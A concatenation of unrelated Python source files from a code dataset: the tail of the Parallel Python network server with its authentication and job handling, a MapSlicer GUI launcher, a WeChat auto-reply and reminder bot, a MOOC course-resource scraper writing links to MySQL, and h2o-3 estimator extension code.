logging.debug("ppserver will exit in %i seconds if no "\
"connections with clients exist" % (self.timeout))
thread.start_new_thread(self.check_timeout, ())
def ncon_add(self, val):
"""Keeps track of the number of connections and time of the last one"""
self.ncon_lock.acquire()
self.ncon += val
self.last_con_time = time.time()
self.ncon_lock.release()
def check_timeout(self):
"""Checks if timeout happened and shutdowns server if it did"""
while True:
if self.ncon == 0:
idle_time = time.time() - self.last_con_time
if idle_time < self.timeout:
time.sleep(self.timeout - idle_time)
else:
logging.debug("exiting ppserver due to timeout (no client"\
" connections in last %i sec)", self.timeout)
os._exit(0)
else:
time.sleep(self.timeout)
def listen(self):
"""Initiates listenting to incoming connections"""
try:
ssocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# following allows ppserver to restart faster on the same port
ssocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
ssocket.bind((self.host, self.port))
ssocket.listen(5)
except socket.error:
logging.error("Cannot create socket with port " + str(self.port)
+ " (port is already in use)")
try:
while 1:
#accept connections from outside
(csocket, address) = ssocket.accept()
#now do something with the clientsocket
#in this case, we'll pretend this is a threaded server
thread.start_new_thread(self.crun, (csocket, ))
except:
logging.debug("Closing server socket")
ssocket.close()
def crun(self, csocket):
"""Authenticates client and handles its jobs"""
mysocket = pptransport.CSocketTransport(csocket)
#send PP version
mysocket.send(version)
#generate a random string
srandom = "".join([random.choice(string.ascii_letters)
for i in xrange(16)])
mysocket.send(srandom)
answer = sha_new(srandom+self.secret).hexdigest()
        clientanswer = mysocket.receive()
        if answer != clientanswer:
            logging.warning("Authentication failed, client host=%s, port=%i"
% csocket.getpeername())
mysocket.send("FAILED")
csocket.close()
return
else:
mysocket.send("OK")
ctype = mysocket.receive()
logging.debug("Control message received: " + ctype)
self.ncon_add(1)
try:
if ctype == "STAT":
#reset time at each new connection
self.get_stats()["local"].time = 0.0
mysocket.send(str(self.get_ncpus()))
while 1:
mysocket.receive()
mysocket.send(str(self.get_stats()["local"].time))
elif ctype=="EXEC":
while 1:
sfunc = mysocket.creceive()
sargs = mysocket.receive()
fun = self.insert(sfunc, sargs)
sresult = fun(True)
mysocket.send(sresult)
except:
#print sys.excepthook(*sys.exc_info())
logging.debug("Closing client socket")
csocket.close()
self.ncon_add(-1)
def broadcast(self):
"""Initiaates auto-discovery mechanism"""
discover = ppauto.Discover(self)
thread.start_new_thread(discover.run,
((self.host, self.port),
(self.bcast, self.port)),
)
def parse_config(file_loc):
"""
Parses a config file in a very forgiving way.
"""
# If we don't have configobj installed then let the user know and exit
try:
from configobj import ConfigObj
except ImportError, ie:
print >> sys.stderr, "ERROR: You must have configobj installed to use \
configuration files. You can still use command line switches."
sys.exit(1)
if not os.access(file_loc, os.F_OK):
print >> sys.stderr, "ERROR: Can not access %s." % arg
sys.exit(1)
# Load the configuration file
config = ConfigObj(file_loc)
# try each config item and use the result if it exists. If it doesn't
# then simply pass and move along
try:
args['secret'] = config['general'].get('secret')
except:
pass
try:
autodiscovery = config['network'].as_bool('autodiscovery')
except:
pass
try:
args['interface'] = config['network'].get('interface',
default="0.0.0.0")
except:
pass
try:
args['broadcast'] = config['network'].get('broadcast')
except:
pass
try:
args['port'] = config['network'].as_int('port')
except:
pass
try:
args['loglevel'] = config['general'].as_bool('debug')
except:
pass
try:
args['ncpus'] = config['general'].as_int('workers')
except:
pass
try:
args['proto'] = config['general'].as_int('proto')
except:
pass
try:
args['restart'] = config['general'].as_bool('restart')
except:
pass
try:
args['timeout'] = config['network'].as_int('timeout')
except:
pass
# Return a tuple of the args dict and autodiscovery variable
return args, autodiscovery
def print_usage():
"""Prints help"""
print "Parallel Python Network Server (pp-" + version + ")"
print "Usage: ppserver.py [-hdar] [-n proto] [-c config_path]"\
" [-i interface] [-b broadcast] [-p port] [-w nworkers]"\
" [-s secret] [-t seconds]"
print
print "Options: "
print "-h : this help message"
print "-d : debug"
print "-a : enable auto-discovery service"
print "-r : restart worker process after each"\
" task completion"
print "-n proto : protocol number for pickle module"
print "-c path : path to config file"
print "-i interface : interface to listen"
print "-b broadcast : broadcast address for auto-discovery service"
print "-p port : port to listen"
print "-w nworkers : number of workers to start"
print "-s secret : secret for authentication"
print "-t seconds : timeout to exit if no connections with "\
"clients exist"
print
print "Due to the security concerns always use a non-trivial secret key."
print "Secret key set by -s switch will override secret key assigned by"
print "pp_secret variable in .pythonrc.py"
print
print "Please visit http://www.parallelpython.com for extended up-to-date"
print "documentation, examples and support forums"
if __name__ == "__main__":
try:
opts, args = getopt.getopt(sys.argv[1:],
"hdarn:c:b:i:p:w:s:t:", ["help"])
except getopt.GetoptError:
print_usage()
sys.exit(1)
args = {}
autodiscovery = False
for opt, arg in opts:
if opt in ("-h", "--help"):
print_usage()
sys.exit()
elif opt == "-c":
args, autodiscovery = parse_config(arg)
elif opt == "-d":
args["loglevel"] = logging.DEBUG
elif opt == "-i":
args["interface"] = arg
elif opt == "-s":
args["secret"] = arg
elif opt == "-p":
args["port"] = int(arg)
elif opt == "-w":
args["ncpus"] = int(arg)
elif opt == "-a":
autodiscovery = True
elif opt == "-r":
args["restart"] = True
elif opt == "-b":
args["broadcast"] = arg
elif opt == "-n":
args["proto"] = int(arg)
elif opt == "-t":
args["timeout"] = int(arg)
server = _NetworkServer(**args)
if autodiscovery:
server.broadcast()
server.listen()
    #have to destroy it here explicitly otherwise an exception
#comes out in Python 2.4
del server
# Parallel Python Software: http://www.parallelpython.com
```
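A typical way to pair this server with the `pp` client library, with the host, port and secret below as placeholders:

```python
# Server side (shell): python ppserver.py -p 35000 -s mysecret -t 300
# Client-side sketch; assumes the standard pp API with a ppservers tuple and a shared secret.
import pp

def part_sum(n):
    return sum(range(n))

job_server = pp.Server(ppservers=("serverhost:35000",), secret="mysecret")
job = job_server.submit(part_sum, (10,))
print(job())  # 45
```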
#### File: gdal2tiles/gdal2tile-mapslicer/mapslicer.py
```python
import os, sys
#import gettext
#gettext.install("mapslicer", "./resources/")
#csText = gettext.translation("mapslicer", "./resources/", languages=['cs'])
#deText = gettext.translation("mapslicer", "./resources/", languages=['de'])
##deText.install()
# Where is the executable file on the disk?
exepath = os.getcwd()
if hasattr(sys, "frozen") or sys.executable.find('MapSlicer.app') != -1:
exepath = os.path.dirname(sys.executable)
# Windows: set the GDAL and PROJ variables ..
if sys.platform in ['win32','win64']:
# .. to the local directory in the py2exe distribution
if os.path.exists(os.path.join( exepath, "gdal" )):
os.environ['PROJ_LIB'] = os.path.join( exepath, "proj" )
os.environ['GDAL_DATA'] = os.path.join( exepath, "gdal" )
os.environ['GDAL_DRIVER_PATH'] = os.path.join( exepath, "gdalplugins" )
# .. to the OSGeo4W default directories
elif os.path.exists('C:\\OSGeo4W\\apps\\gdal-16'):
sys.path.insert(0, 'C:\\OSGeo4W\\apps\\gdal-16\\pymod' )
os.environ['PATH'] += ';C:\\OSGeo4W\\bin'
os.environ['PROJ_LIB'] = 'C:\\OSGeo4W\\share\\proj'
os.environ['GDAL_DATA'] = 'C:\\OSGeo4W\\apps\\gdal-16\\share\\gdal'
os.environ['GDAL_DRIVER_PATH'] = 'C:\\OSGeo4W\\apps\\gdal-16\\bin\\gdalplugins'
# otherwise we need to use existing system setup
# Mac: GDAL.framework is in the application bundle or in the /Library/Frameworks
if sys.platform == 'darwin' and not os.environ.has_key('GDAL_DATA'):
frameworkpath = exepath[:(exepath.find('MapSlicer.app')+12)]+'/Contents/Frameworks'
if not os.path.exists( os.path.join(frameworkpath, "GDAL.framework" )):
frameworkpath = "/Library/Frameworks"
os.environ['PROJ_LIB'] = os.path.join( frameworkpath, "PROJ.framework/Resources/proj/" )
os.environ['GDAL_DATA'] = os.path.join( frameworkpath, "GDAL.framework/Resources/gdal/" )
os.environ['GDAL_DRIVER_PATH'] = os.path.join( frameworkpath, "GDAL.framework/PlugIns/" )
sys.path.insert(0, os.path.join( frameworkpath, "GDAL.framework/Versions/Current/Python/site-packages/" ))
# Other systems need correctly installed GDAL libraries
import traceback
import wx
import mapslicer
__version__ = mapslicer.version
class MapSlicerApp(wx.App):
def OnInit(self):
wx.InitAllImageHandlers()
self.main_frame = mapslicer.MainFrame(None, -1, "")
self.SetTopWindow(self.main_frame)
self.SetAppName("MapSlicer")
return True
def MacOpenFile(self, filename):
self.main_frame._add(filename)
def Show(self):
self.main_frame.Show()
def ExceptHook(self, type, value, tb):
back_trace = "".join(traceback.format_exception(type, value, tb))
print
print "=============================================================="
print back_trace
print
caption = _("Exception occured")
message = _("An unexpected error occured:\n\n") + str(value)
wx.MessageBox(message, caption, wx.ICON_ERROR)
if __name__ == "__main__":
#_ = gettext.gettext
_ = lambda s: s
# TODO: Parse command line arguments:
# for both batch processing and initialization of the GUI
#wx.SystemOptions.SetOptionInt("mac.listctrl.always_use_generic",0)
app = MapSlicerApp(False)
try:
from osgeo import gdal
except ImportError:
# TODO: Platform specific error messages - are part of the GUI...
if sys.platform == 'darwin':
wx.MessageBox(_("""GDAL 1.6 framework is not found in your system!\n
Please install GDAL framework from the website:
http://www.kyngchaos.com/software:frameworks"""), _("Error: GDAL Framework not found!"), wx.ICON_ERROR)
import webbrowser
webbrowser.open_new("http://gdal.org")
sys.exit(1)
elif sys.platform in ['win32','win64']:
wx.MessageBox(_("""GDAL 1.6 library is not found in your system!"""),
_("Error: GDAL library not found!"), wx.ICON_ERROR)
sys.exit(1)
elif sys.platform.startswith('linux'):
wx.MessageBox(_("""GDAL 1.6 library is not found in your system!\n
Please install it as a package in your distribution or from the source code:
http://trac.osgeo.org/gdal/wiki/BuildHints"""), _("Error: GDAL library not found!"), wx.ICON_ERROR)
sys.exit(1)
print _("GDAL library not available - please install GDAL and its python module!")
sys.excepthook = app.ExceptHook
app.Show()
app.MainLoop()
``` |
{
"source": "1391382616/EverydayWechat",
"score": 2
} |
#### File: EverydayWechat/everyday_wechat/main.py
```python
import re
import time
# import json
import platform
import random
# from apscheduler.schedulers.blocking import BlockingScheduler
from apscheduler.schedulers.background import BackgroundScheduler
import itchat
from itchat.content import (
TEXT
)
from everyday_wechat.utils.common import md5_encode
from everyday_wechat.utils.data_collection import (
get_bot_info,
get_weather_info,
get_dictum_info,
get_diff_time,
get_calendar_info,
get_constellation_info
)
from everyday_wechat.utils import config
reply_userNames = []
FILEHELPER_MARK = ['文件传输助手', 'filehelper'] # 文件传输助手标识
FILEHELPER = 'filehelper'
TIME_COMPILE = re.compile(r'^\s*([01]?[0-9]|2[0-3])\s*[::\-]\s*([0-5]?[0-9])\s*$')
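# TIME_COMPILE matches "HH:MM"-style strings with ":", a full-width colon or "-" as separator, e.g. "8:30", "08:30", "21-5".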
def run():
""" 主运行入口 """
conf = config.init()
# conf = get_yaml()
if not conf: # 如果 conf,表示配置文件出错。
print('程序中止...')
return
# 判断是否登录,如果没有登录则自动登录,返回 False 表示登录失败
if not is_online(auto_login=True):
return
def is_online(auto_login=False):
"""
判断是否还在线。
:param auto_login: bool,当为 Ture 则自动重连(默认为 False)。
:return: bool,当返回为 True 时,在线;False 已断开连接。
"""
def _online():
"""
通过获取好友信息,判断用户是否还在线。
:return: bool,当返回为 True 时,在线;False 已断开连接。
"""
try:
if itchat.search_friends():
return True
except IndexError:
return False
return True
if _online(): return True # 如果在线,则直接返回 True
if not auto_login: # 不自动登录,则直接返回 False
print('微信已离线..')
return False
hotReload = not config.get('is_forced_switch', False) # 切换微信号,重新扫码。
loginCallback = init_wechat
exitCallback = exit_msg
for _ in range(2): # 尝试登录 2 次。
if platform.system() == 'Windows':
itchat.auto_login(hotReload=hotReload, loginCallback=loginCallback, exitCallback=exitCallback)
itchat.run(blockThread=True)
else:
# 命令行显示登录二维码。
itchat.auto_login(enableCmdQR=2, hotReload=hotReload, loginCallback=loginCallback,
exitCallback=exitCallback)
itchat.run(blockThread=True)
if _online():
print('登录成功')
return True
print('登录失败。')
return False
def init_wechat():
""" 初始化微信所需数据 """
set_system_notice('登录成功')
# conf = get_yaml()
itchat.get_friends(update=True) # 更新好友数据。
itchat.get_chatrooms(update=True) # 更新群聊数据。
# 从config copy ,用于保存新的接口内容。
myset = config.copy()
# start---------------------------处理自动回复好友---------------------------start
relay = myset.get('auto_relay_info')
if relay.get('is_auto_relay'):
auto_reply_uuids = []
for name in relay.get('auto_reply_names'):
if name.lower() in FILEHELPER_MARK: # 判断是否文件传输助手
if FILEHELPER not in reply_userNames:
auto_reply_uuids.append(FILEHELPER)
continue
friend = get_friend(name)
if friend:
auto_reply_uuids.append(friend['UserName'])
else:
print('自动回复中的好友昵称『{}』有误。'.format(name))
relay['auto_reply_uuids'] = set(auto_reply_uuids)
print('已开启图灵自动回复...')
# end---------------------------处理自动回复好友---------------------------end
alarm = myset.get('alarm_info')
alarm_dict = {}
if alarm.get('is_alarm'):
for gi in alarm.get('girlfriend_infos'):
ats = gi.get('alarm_timed')
if not ats:
continue
uuid_list = []
# start---------------------------处理好友---------------------------start
friends = gi.get('wechat_name')
if isinstance(friends, str):
friends = [friends]
if isinstance(friends, list):
for name in friends:
if name.lower() in FILEHELPER_MARK: # 判断是否文件传输助手
uuid_list.append(FILEHELPER)
continue
name_info = get_friend(name)
if not name_info:
print('用户昵称{}无效'.format(name))
else:
uuid_list.append(name_info['UserName'])
# end---------------------------处理好友---------------------------end
# start---------------------------群组处理---------------------------start
group_names = gi.get('group_name')
if isinstance(group_names, str):
group_names = [group_names]
if isinstance(group_names, list):
for name in group_names:
name_info = get_group(name)
if not name_info:
print('定时任务中的群聊名称『{}』有误。'
'(注意:必须要把需要的群聊保存到通讯录)'.format(name))
else:
uuid_list.append(name_info['UserName'])
# end---------------------------群组处理---------------------------end
# start---------------------------定时处理---------------------------start
if isinstance(ats, str):
ats = [ats]
if isinstance(ats, list):
for at in ats:
times = TIME_COMPILE.findall(at)
if not times:
print('时间{}格式出错'.format(at))
continue
hour, minute = int(times[0][0]), int(times[0][1])
temp_dict = {'hour': hour, 'minute': minute, 'uuid_list': uuid_list}
temp_dict.update(gi)
alarm_dict[md5_encode(str(temp_dict))] = temp_dict
# end---------------------------定时处理---------------------------end
alarm['alarm_dict'] = alarm_dict
# 将解析的数据保存于config中。
config.update(myset)
# print(json.dumps(alarm_dict, ensure_ascii=False))
# 提醒内容不为空时,启动定时任务
if alarm_dict:
init_alarm(alarm_dict) # 初始化定时任务
def init_alarm(alarm_dict):
# 定时任务
scheduler = BackgroundScheduler()
for key, value in alarm_dict.items():
scheduler.add_job(send_alarm_msg, 'cron', [key], hour=value['hour'],
minute=value['minute'], id=key, misfire_grace_time=10 * 60)
scheduler.start()
print('已开启定时发送提醒功能...')
# print(scheduler.get_jobs())
def send_alarm_msg(key):
""" 发送定时提醒 """
print('\n启动定时自动提醒...')
conf = config.get('alarm_info').get('alarm_dict')
gf = conf.get(key)
# print(gf)
calendar_info = get_calendar_info(gf.get('calendar'))
dictum = get_dictum_info(gf.get('dictum_channel'))
weather = get_weather_info(gf.get('city_name'))
diff_time = get_diff_time(gf.get('start_date'), gf.get('start_date_msg'))
sweet_words = gf.get('sweet_words')
horoscope = get_constellation_info(gf.get("horescope"))
send_msg = '\n'.join(x for x in [calendar_info, weather, horoscope, dictum, diff_time, sweet_words] if x)
# print('\n' + send_msg + '\n')
if not send_msg or not is_online(): return
uuid_list = gf.get('uuid_list')
for uuid in uuid_list:
time.sleep(1)
itchat.send(send_msg, toUserName=uuid)
print('\n定时内容:\n{}\n发送成功...\n\n'.format(send_msg))
print('自动提醒消息发送完成...\n')
@itchat.msg_register([TEXT])
def text_reply(msg):
""" 监听用户消息,用于自动回复 """
try:
# if not get_yaml().get('is_auto_relay'):
# return
conf = config.get('auto_relay_info')
if not conf.get('is_auto_relay'):
return
# print(json.dumps(msg, ensure_ascii=False))
# 获取发送者的用户id
uuid = FILEHELPER if msg['ToUserName'] == FILEHELPER else msg.fromUserName
# 如果用户id是自动回复列表的人员
if uuid in conf.get('auto_reply_uuids'):
receive_text = msg.text # 好友发送来的消息内容
# 好友叫啥,用于打印
nickName = FILEHELPER if uuid == FILEHELPER else msg.user.nickName
print('\n{}发来信息:{}'.format(nickName, receive_text))
reply_text = get_bot_info(receive_text, uuid) # 获取自动回复
if reply_text: # 如内容不为空,回复消息
time.sleep(random.randint(1, 2)) # 休眠一秒,保安全。想更快的,可以直接注释。
reply_text = reply_text if not uuid == FILEHELPER else '机器人回复:' + reply_text
itchat.send(reply_text, toUserName=uuid)
print('回复{}:{}'.format(nickName, reply_text))
else:
print('自动回复失败\n')
except Exception as exception:
print(str(exception))
def set_system_notice(text):
"""
给文件传输助手发送系统日志。
:param text:str 日志内容
"""
if text:
text = '系统通知:' + text
itchat.send(text, toUserName=FILEHELPER)
def exit_msg():
""" 项目中止提醒 """
set_system_notice('项目已断开连接')
def get_group(group_name, update=False):
    """
    Look up a saved group chat by its name.
    :param group_name: str, group chat name
    :param update: bool, force refreshing the cached group data
    :return: obj, the first matching group, or None
    """
    if update: itchat.get_chatrooms(update=True)
    if not group_name: return None
    groups = itchat.search_chatrooms(name=group_name)
    if not groups: return None
    return groups[0]
def get_friend(wechat_name, update=False):
"""
根据用户名获取用户数据
:param wechat_name: str 用户名
:param update: bool 强制更新用户数据
:return: obj 单个好友信息
"""
if update: itchat.get_friends(update=True)
if not wechat_name: return None
friends = itchat.search_friends(name=wechat_name)
if not friends: return None
return friends[0]
if __name__ == '__main__':
run()
# pass
# config.init()
# init_wechat()
``` |
{
"source": "1392517138/MOOC-Download-master",
"score": 3
} |
#### File: 1392517138/MOOC-Download-master/main.py
```python
import requests
# from bs4 import BeautifulSoup
import re
import os
import pymysql
HEADER = {'User-Agent': 'Mozilla/5.0'}
SOURCE_INFO_URL = 'http://www.icourse163.org/dwr/call/plaincall/CourseBean.getMocTermDto.dwr'
SOURCE_RESOURCE_URL = 'http://www.icourse163.org/dwr/call/plaincall/CourseBean.getLessonUnitLearnVo.dwr'
class Course(object):
    '''
    Stores basic information about a course.
    '''
def __init__(self, *args, **kwargs):
self.course_page_url = 'http://www.icourse163.org/learn/'
def set_course(self, course):
self.course = course
def get_course_info(self):
try:
            '''
            Fetch basic course information and the course id
            needed for the later POST requests.
            '''
course_page_url = self.course_page_url + self.course
course_page = requests.get(course_page_url, headers=HEADER)
id_pattern_compile = re.compile(r'id:(\d+),')
# 获取课程名称
basicinfo_pattern_compile = re.compile(
r'<meta name="description" .*?content=".*?,(.*?),(.*?),.*?/>')
basic_set = re.search(basicinfo_pattern_compile, course_page.text)
self.course_title = basic_set.group(1)
self.course_collage = basic_set.group(2)
self.course_id = re.search(id_pattern_compile,
course_page.text).group(1)
except ArithmeticError:
pass
def get_course_all_source(course_id):
    '''
    Use the parsed course_id to fetch all downloadable resources of the course.
    '''
# 选择下载视频的清晰度
video_level = select_video_level()
# c0-param0:代表课程id
# batchId:可以为任意时间戳
# 其他字段为固定不变字段
print(video_level + '---video_level')
post_data = {
'callCount': '1',
'scriptSessionId': '${scriptSessionId}190',
'c0-scriptName': 'CourseBean',
'c0-methodName': 'getMocTermDto',
'c0-id': '0',
'c0-param0': 'number:' + course_id,
'c0-param1': 'number:1',
'c0-param2': 'boolean:true',
'batchId': '1492167717772'
}
print(course_id + '---get_course_all_source')
source_info = requests.post(
SOURCE_INFO_URL, data=post_data, headers=HEADER)
# 对文档内容进行解码,以便查看中文
source_info_transcoding = source_info.text.encode('utf-8').decode(
'unicode_escape')
# 这里的id是一级目录id
chapter_pattern_compile = re.compile(
r'homeworks=.*?;.+id=(\d+).*?name="(.*?)";')
# 查找所有一级级目录id和name
chapter_set = re.findall(chapter_pattern_compile, source_info_transcoding)
with open('TOC.txt', 'w', encoding='utf-8') as file:
# 遍历所有一级目录id和name并写入目录
for index, single_chaper in enumerate(chapter_set):
file.write('%s \n' % (single_chaper[1]))
# 这里id为二级目录id
lesson_pattern_compile = re.compile(
r'chapterId=' + single_chaper[0] +
r'.*?contentType=1.*?id=(\d+).+name="(.*?)".*?test')
# 查找所有二级目录id和name
lesson_set = re.findall(lesson_pattern_compile,
source_info_transcoding)
# 遍历所有二级目录id和name并写入目录
for sub_index, single_lesson in enumerate(lesson_set):
file.write(' %s \n' % (single_lesson[1]))
# 查找二级目录下视频,并返回 [contentid,contenttype,id,name]
video_pattern_compile = re.compile(
r'contentId=(\d+).+contentType=(1).*?id=(\d+).*?lessonId='
+ single_lesson[0] + r'.*?name="(.+)"')
video_set = re.findall(video_pattern_compile,
source_info_transcoding)
# 查找二级目录下文档,并返回 [contentid,contenttype,id,name]
pdf_pattern_compile = re.compile(
r'contentId=(\d+).+contentType=(3).+id=(\d+).+lessonId=' +
single_lesson[0] + r'.+name="(.+)"')
pdf_set = re.findall(pdf_pattern_compile,
source_info_transcoding)
name_pattern_compile = re.compile(
r'^[第一二三四五六七八九十\d]+[\s\d\._章课节讲]*[\.\s、]\s*\d*')
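                # Strips leading chapter/lesson numbering from resource names,
                # e.g. "第一章 1.1 概述" -> "概述", "2.3 示例" -> "示例" (illustrative examples).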
# 遍历二级目录下视频集合,写入目录并下载
count_num = 0
for video_index, single_video in enumerate(video_set):
rename = re.sub(name_pattern_compile, '', single_video[3])
file.write(' [视频] %s \n' % (rename))
get_content(
course_id,
single_video, '%d.%d.%d [视频] %s' %
(index + 1, sub_index + 1, video_index + 1, rename),
video_level)
count_num += 1
# 遍历二级目录下pdf集合,写入目录并下载
for pdf_index, single_pdf in enumerate(pdf_set):
rename = re.sub(name_pattern_compile, '', single_pdf[3])
file.write(' [文档] %s \n' % (rename))
get_content(
course_id,
single_pdf, '%d.%d.%d [文档] %s' %
(index + 1, sub_index + 1, pdf_index + 1 + count_num,
rename))
def get_content(course_id, single_content, name, *args):
conn = pymysql.connect(host='127.0.0.1', port=3306, db='graduate',
user='root', password='<PASSWORD>')
cusor = conn.cursor()
course = Course()
    # SQL statements for the inserts
    # insert a resource row
    sql1 = "insert into resource (course_id,resource_type,resource_name) value (%s,%s,%s)"
    # insert a document (PDF) row
    sql2 = "insert into pdf (resource_id,pdf_url) value (%s,%s)"
    # insert a video (MP4) row
    sql3 = "insert into mp4 (resource_id,mp4_url) value (%s,%s)"
    # holds the video download URL
url2 = ''
    '''
    Documents (PDF) are downloaded directly;
    for videos only the download link is stored for an external downloader.
    '''
# 检查文件命名,防止网站资源有特殊字符本地无法保存
file_pattern_compile = re.compile(r'[\\/:\*\?"<>\|]')
name = re.sub(file_pattern_compile, '', name)
# 检查是否有重名的(即已经下载过的)
if os.path.exists('PDFs\\' + name + '.pdf'):
print(name + "------------->已下载")
return
post_data = {
'callCount': '1',
'scriptSessionId': '${scriptSessionId}190',
'httpSessionId': '5531d06316b34b9486a6891710115ebc',
'c0-scriptName': 'CourseBean',
'c0-methodName': 'getLessonUnitLearnVo',
'c0-id': '0',
'c0-param0': 'number:' + single_content[0], # 二级目录id
'c0-param1': 'number:' + single_content[1], # 判定文件还是视频
'c0-param2': 'number:0',
'c0-param3': 'number:' + single_content[2], # 具体资源id
'batchId': '1492168138043'
}
sources = requests.post(
SOURCE_RESOURCE_URL, headers=HEADER, data=post_data).text
# 如果是视频的话
if single_content[1] == '1':
try:
if args[0] == 'a':
download_pattern_compile = re.compile(
r'mp4SdUrl="(.*?\.mp4).*?"')
elif args[0] == "b":
download_pattern_compile = re.compile(
r'mp4HdUrl="(.*?\.mp4).*?"')
else:
download_pattern_compile = re.compile(
r'mp4ShdUrl="(.*?\.mp4).*?"')
video_down_url = re.search(download_pattern_compile,
sources).group(1)
except AttributeError:
# print('------------------------')
# print(name + '没有该清晰度格式,降级处理')
# print('------------------------')
# download_pattern_compile = re.compile(r'mp4SdUrl="(.*?\.mp4).*?"')
# video_down_url = re.search(download_pattern_compile,
# sources).group(1)
# 如果发生异常,跳过
return
print('正在存储链接:' + name + '.mp4')
with open('Links.txt', 'a', encoding='utf-8') as file:
file.write('%s \n' % (video_down_url))
url2 = video_down_url
with open('Rename.bat', 'a', encoding='utf-8') as file:
video_down_url = re.sub(r'/', '_', video_down_url)
# file.write('rename "' + re.search(
# r'http:.*video_(.*.mp4)', video_down_url).group(1) + '" "' +
# name + '.mp4"' + '\n')
file.write(name + '\n')
        # first insert the resource row
        cusor.execute(sql1, (course_id, 'mp4', name))
        # then insert the MP4 row using the generated primary key
cusor.execute(sql3, (conn.insert_id(), url2))
conn.commit()
# 如果是文档的话
else:
pdf_download_url = re.search(r'textOrigUrl:"(.*?)"', sources).group(1)
print('正在下载:' + name + '.pdf')
pdf_file = requests.get(pdf_download_url, headers=HEADER)
if not os.path.isdir('PDFs'):
os.mkdir(r'PDFs')
with open('PDFLinks.txt', 'a', encoding='utf-8') as file:
file.write('%s \n' % (pdf_download_url))
with open('PDFName.txt', 'a', encoding='utf-8') as file:
file.write('%s \n' % (name))
# with open('PDFs\\' + name + '.pdf', 'wb') as file:
# file.write(pdf_file.content)
        # insert into the document tables
        # first insert the resource row
        cusor.execute(sql1, (course_id, 'pdf', name))
        # then insert the PDF row (sql2) using the generated primary key
cusor.execute(sql2, (conn.insert_id(), pdf_download_url))
conn.commit()
cusor.close()
conn.close()
def select_video_level():
    # '''
    # Select the video quality
    # '''
    # print('\n')
    # print('------------------------')
    # print("| Please choose a video quality: |")
    # print("| |")
    # print("| (a) SD   (b) HD   (c) UHD |")
    # print("| |")
    # print('------------------------')
    # video_level = input('Please choose (a, b or c)')
    # level = {'a': "SD", 'b': 'HD', 'c': "UHD"}
    # print('\n')
    # print('------------------------')
    # print('Videos will be downloaded in [' + level.get(video_level) + '] quality')
    # print('------------------------')
    # print('\n')
return 'a'
def check_select_course(course):
    # '''
    # Let the user verify that the entered course id is correct
    # '''
    # print("\n")
    # print('------------------------')
    # print('You selected:')
    # print(course.course_title + '\n' + course.course_collage)
    # print('------------------------')
    # return input('Please confirm (y/n):')
return 'y'
def main():
conn = pymysql.connect(host='127.0.0.1', port=3306, db='graduate',
user='root', password='<PASSWORD>')
cusor = conn.cursor()
course = Course()
    # Links.txt is opened in append mode, so delete any previous copy first
if os.path.exists('Links.txt'):
os.remove('Links.txt')
if os.path.exists('PDFLinks.txt'):
os.remove('PDFLinks.txt')
if os.path.exists('PDFName.txt'):
os.remove('PDFName.txt')
    # Rename.bat is also appended to: delete the old file first, then set the console code page / encoding
if os.path.exists("Rename.bat"):
os.remove("Rename.bat")
with open('Rename.bat', 'a', encoding='utf-8') as file:
file.writelines('chcp 65001\n')
    # Query all course ids
sql = "select course_id from mooc "
cusor.execute(sql)
acourseid = cusor.fetchall()
bcourseid = []
    # Flatten the tuple-of-tuples returned by fetchall() into a list of id strings
for a in acourseid:
bcourseid.append(a[0])
# print(bcourseid)
# for i in courseid:
# print(i)
conn.commit()
# cusor.close()
# conn.close()
# while True:
    # course.set_course(input("\nEnter a course id (e.g. SICNU-1002031014)"))
    # Iterate over the courses and store them
sql4 = 'update mooc set course_id=%s where course_id=%s'
# for i in bcourseid:
# try:
# course.set_course(i)
# course.get_course_info()
# # if check_select_course(course) == 'y':
# # break
    # # update the course_id stored in the mooc table
# print(i)
# print(course.course_id)
# cusor.execute(sql4,[course.course_id,i])
# conn.commit()
    # # fetch the course resources
# # get_course_all_source(course.course_id)
# except BaseException:
# continue
course_id = 'SWJTU - 1001911007'
course.set_course(course_id)
course.get_course_info()
cusor.execute(sql4, [course.course_id, course_id])
conn.commit()
# print(bcourseid[0])
# get_course_all_source(bcourseid[0])
cusor.close()
conn.close()
if __name__ == '__main__':
main()
``` |
{
"source": "13927729580/h2o-3",
"score": 3
} |
#### File: custom/python/gen_generic.py
```python
def class_extensions():
def _requires_training_frame(self):
"""
Determines if Generic model requires a training frame.
:return: False.
"""
return False
@staticmethod
def from_file(file=str):
"""
Creates new Generic model by loading existing embedded model into library, e.g. from H2O MOJO.
The imported model must be supported by H2O.
:param file: A string containing path to the file to create the model from
:return: H2OGenericEstimator instance representing the generic model
"""
model = H2OGenericEstimator(path = file)
model.train()
return model
extensions = dict(
__init__validation="""
if all(kwargs.get(name, None) is None for name in ["model_key", "path"]):
raise H2OValueError('At least one of ["model_key", "path"] is required.')
""",
__class__=class_extensions,
)
```
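The `from_file` helper above simply wraps the two-step flow the docstring describes (construct with `path`, then `train()` to import the embedded model). A minimal usage sketch, assuming a running H2O cluster; the MOJO path is illustrative, not from the source:

```python
import h2o
from h2o.estimators import H2OGenericEstimator

h2o.init()
# "/tmp/gbm_model.zip" is a placeholder; any MOJO exported by a supported H2O algorithm works.
generic = H2OGenericEstimator.from_file("/tmp/gbm_model.zip")
print(generic)
```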
#### File: custom/python/gen_svd.py
```python
rest_api_version = 99
def class_extensions():
def init_for_pipeline(self):
"""
Returns H2OSVD object which implements fit and transform method to be used in sklearn.Pipeline properly.
All parameters defined in self.__params, should be input parameters in H2OSVD.__init__ method.
:returns: H2OSVD object
"""
import inspect
from h2o.transforms.decomposition import H2OSVD
# check which parameters can be passed to H2OSVD init
var_names = list(dict(inspect.getmembers(H2OSVD.__init__.__code__))['co_varnames'])
parameters = {k: v for k, v in self._parms.items() if k in var_names}
return H2OSVD(**parameters)
extensions = dict(
__class__=class_extensions,
)
```
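A hedged sketch of what `init_for_pipeline` is for: turning an already-configured SVD estimator into a scikit-learn-compatible transform. The estimator class name and the `nv` parameter below are recalled from the h2o Python package and may differ between versions:

```python
from h2o.estimators import H2OSingularValueDecompositionEstimator  # class name is an assumption

# Configure the estimator as usual, then ask for the sklearn-friendly wrapper.
svd_estimator = H2OSingularValueDecompositionEstimator(nv=4)
sk_svd = svd_estimator.init_for_pipeline()  # returns an H2OSVD exposing fit/transform
```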
#### File: h2o/estimators/isolation_forest.py
```python
from __future__ import absolute_import, division, print_function, unicode_literals
from h2o.estimators.estimator_base import H2OEstimator
from h2o.exceptions import H2OValueError
from h2o.frame import H2OFrame
from h2o.utils.typechecks import assert_is_type, Enum, numeric
